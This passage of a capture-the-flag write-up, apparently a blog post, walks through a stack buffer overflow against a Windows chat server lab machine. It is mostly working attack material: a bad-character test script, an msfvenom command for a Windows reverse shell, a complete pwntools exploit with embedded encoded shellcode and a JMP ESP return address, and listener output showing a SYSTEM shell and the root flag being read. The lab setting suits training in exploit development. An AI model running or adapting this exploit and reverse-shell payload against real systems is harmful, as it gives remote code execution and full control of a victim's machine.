0x62501527 : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)
0x62501533 : "\xff\xe4" | asciiprint,ascii {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnerable-apps\chatserver\essfunc.dll)

Converting the address to little endian, the byte order in which it has to be written into the buffer:

62501533 -> “\x33\x15\x50\x62”

The next step is finding the bad chars. For this task I used mona to generate the byte array (every value except \x00, which terminates C strings) and modified my script to send it right after the EIP overwrite:

!mona bytearray -cpb \x00

#!/usr/bin/env python3
# Send the 4560-byte padding, "BBBB" into EIP and then every byte value
# except \x00, so the bytes that reach the stack can be compared with
# mona's bytearray.bin.

from pwn import *

HOST = "10.10😄"
PORT = 9999
offset = 4560
fuzz = b"A" * offset
badchars = (b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
            b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
            b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
            b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
            b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
            b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
            b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
            b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

r = remote(HOST, PORT)
print(r.recvline(timeout=1))   # banner
print(r.recvline(timeout=1))   # username prompt
print("[+] SENDING USERNAME")
r.send(fuzz + b"BBBB" + badchars + b"\r\n")   # bytes, so no text encoding touches the values
r.clean()
print("[+] SENDING CHAT")
r.send(b"Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if r.recvline(timeout=4) == b'':
    print("[!] KO CHAT")   # no reply: the server crashed, compare the stack in the debugger
r.close()

Then compare the bytes that reached the stack (at the address where they landed in the debugger) against the generated file with mona:

!mona compare -a 017DEEC0 -f C:\Users\admin\Desktop\chatserver\bytearray.bin

It worked on the first try! So the only bad char is \x00.
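As an added example (not from the original writeup), the logic behind !mona bytearray and !mona compare in plain Python, with constructed dumps: one intact, as in this writeup, and two where a byte was mangled, which is what a corrupted comparison looks like:

```python
def bytearray_without(excluded=b"\x00"):
    """Every byte value 0x00..0xff except the excluded ones
    (what !mona bytearray -cpb \\x00 writes to bytearray.bin)."""
    return bytes(b for b in range(256) if b not in excluded)


def compare_badchars(sent, dumped):
    """What !mona compare checks: walk the bytes that were sent against the
    bytes read back from memory. Returns ('unmodified', []) when they match,
    otherwise ('corruption', diffs) with (offset, sent_byte, found_byte)
    tuples; found_byte is None where the dump ends early (truncation)."""
    diffs = []
    for i, b in enumerate(sent):
        if i >= len(dumped):
            diffs.append((i, b, None))
            break
        if dumped[i] != b:
            diffs.append((i, b, dumped[i]))
    return ("unmodified" if not diffs else "corruption"), diffs


def first_badchar(sent, dumped):
    """The byte to exclude in the next round: the sent byte at the first
    difference. Everything after a truncation or substitution is noise, so
    bad chars are found one per round, regenerating the array each time."""
    _, diffs = compare_badchars(sent, dumped)
    return diffs[0][1] if diffs else None


if __name__ == "__main__":
    sent = bytearray_without(b"\x00")
    # Constructed dumps: intact, \x0a replaced by \x00, and reading stopped at \x0a
    print(compare_badchars(sent, sent)[0])                      # unmodified
    print(first_badchar(sent, sent.replace(b"\x0a", b"\x00")))  # 10
    print(first_badchar(sent, sent[:9]))                        # 10
```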

Shellcode generated with msfvenom (a reverse shell to my listener on port 4433, avoiding \x00 with -b):

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10😄 LPORT=4433 -f c -v shellcode -b '\x00' EXITFUNC=thread
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1506 bytes

The final script:

#!/usr/bin/env python3
# Final exploit: padding up to the return address, the JMP ESP address from
# essfunc.dll (little endian), a NOP sled and the msfvenom shellcode.

from pwn import *

HOST = "10.10😄"
PORT = 9999

offset = 4560

shellcode = ("\xda\xce\xd9\x74\x24\xf4\xba\x30\x2e\x3b\xeb\x5b\x33\xc9\xb1"
"\x52\x31\x53\x17\x03\x53\x17\x83\xdb\xd2\xd9\x1e\xe7\xc3\x9c"
"\xe1\x17\x14\xc1\x68\xf2\x25\xc1\x0f\x77\x15\xf1\x44\xd5\x9a"
"\x7a\x08\xcd\x29\x0e\x85\xe2\x9a\xa5\xf3\xcd\x1b\x95\xc0\x4c"
"\x98\xe4\x14\xae\xa1\x26\x69\xaf\xe6\x5b\x80\xfd\xbf\x10\x37"
"\x11\xcb\x6d\x84\x9a\x87\x60\x8c\x7f\x5f\x82\xbd\x2e\xeb\xdd"
"\x1d\xd1\x38\x56\x14\xc9\x5d\x53\xee\x62\x95\x2f\xf1\xa2\xe7"
"\xd0\x5e\x8b\xc7\x22\x9e\xcc\xe0\xdc\xd5\x24\x13\x60\xee\xf3"
"\x69\xbe\x7b\xe7\xca\x35\xdb\xc3\xeb\x9a\xba\x80\xe0\x57\xc8"
"\xce\xe4\x66\x1d\x65\x10\xe2\xa0\xa9\x90\xb0\x86\x6d\xf8\x63"
"\xa6\x34\xa4\xc2\xd7\x26\x07\xba\x7d\x2d\xaa\xaf\x0f\x6c\xa3"
"\x1c\x22\x8e\x33\x0b\x35\xfd\x01\x94\xed\x69\x2a\x5d\x28\x6e"
"\x4d\x74\x8c\xe0\xb0\x77\xed\x29\x77\x23\xbd\x41\x5e\x4c\x56"
"\x91\x5f\x99\xf9\xc1\xcf\x72\xba\xb1\xaf\x22\x52\xdb\x3f\x1c"
"\x42\xe4\x95\x35\xe9\x1f\x7e\x30\xe7\x1b\x0a\x2c\xf5\x23\xe3"
"\xfd\x70\xc5\x69\xee\xd4\x5e\x06\x97\x7c\x14\xb7\x58\xab\x51"
"\xf7\xd3\x58\xa6\xb6\x13\x14\xb4\x2f\xd4\x63\xe6\xe6\xeb\x59"
"\x8e\x65\x79\x06\x4e\xe3\x62\x91\x19\xa4\x55\xe8\xcf\x58\xcf"
"\x42\xed\xa0\x89\xad\xb5\x7e\x6a\x33\x34\xf2\xd6\x17\x26\xca"
"\xd7\x13\x12\x82\x81\xcd\xcc\x64\x78\xbc\xa6\x3e\xd7\x16\x2e"
"\xc6\x1b\xa9\x28\xc7\x71\x5f\xd4\x76\x2c\x26\xeb\xb7\xb8\xae"
"\x94\xa5\x58\x50\x4f\x6e\x78\xb3\x45\x9b\x11\x6a\x0c\x26\x7c"
"\x8d\xfb\x65\x79\x0e\x09\x16\x7e\x0e\x78\x13\x3a\x88\x91\x69"
"\x53\x7d\x95\xde\x54\x54")

esp = b"\x33\x15\x50\x62"   # 0x62501533, JMP ESP in essfunc.dll, little endian
nop = b"\x90" * 20           # NOP sled in front of the shellcode

# The shellcode above is a str of \x escapes; latin-1 maps each escape to
# exactly one byte, and sending bytes keeps pwntools from re-encoding it.
payload = b"A" * offset + esp + nop + shellcode.encode("latin-1") + b"\r\n"

r = remote(HOST, PORT)
print(r.recvline(timeout=1))   # banner
print(r.recvline(timeout=1))   # username prompt
print("[+] SENDING USERNAME")
r.send(payload)
r.clean()
print("[+] SENDING CHAT")
r.send(b"Ok\r\n")
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
print(r.recvline(timeout=1))
if r.recvline(timeout=4) == b'':
    print("[!] KO CHAT")   # no reply from the chat: check the nc listener
r.close()

Listening on my machine with nc:

nc -lvp 4433
listening on [any] 4433 ...
10.10😄: inverse host lookup failed: Unknown host
connect to [10.10😄] from (UNKNOWN) [10.10😄] 49299
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\admin\Desktop\vulnerable-apps\chatserver>

It worked!

So now my custom script can be fired against the real machine.

Just change the IP to the real one. It worked flawlessly on the first try 😎

nc -lvp 4433
listening on [any] 4433 ...
10.10😄: inverse host lookup failed: Unknown host
connect to [10.10😄] from (UNKNOWN) [10.10😄] 49467
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

The service was running as nt authority\system, so the machine is rooted.

Finally, the root flag is under the following path:

C:\Users\drake\Desktop>type root.txt
type root.txt
5b10😄

I enjoyed the machine because everything went as expected without issues; the only bad char being \x00 was refreshing, because I expected a lot of debugging in the bad char process. Not bad at all. The machine description suggests that you have to reverse engineer the .exe file, so you can probably use another approach, like Ghidra, radare2 or another reverse engineering tool, but my goal was to practice buffer overflow attacks with mona and exploit development with Python and pwntools.

I was happy at the end; it was also more fun than exploiting the same .exe file with different badchars/offset like in the previous posts. Good stuff.


Thanks for reading!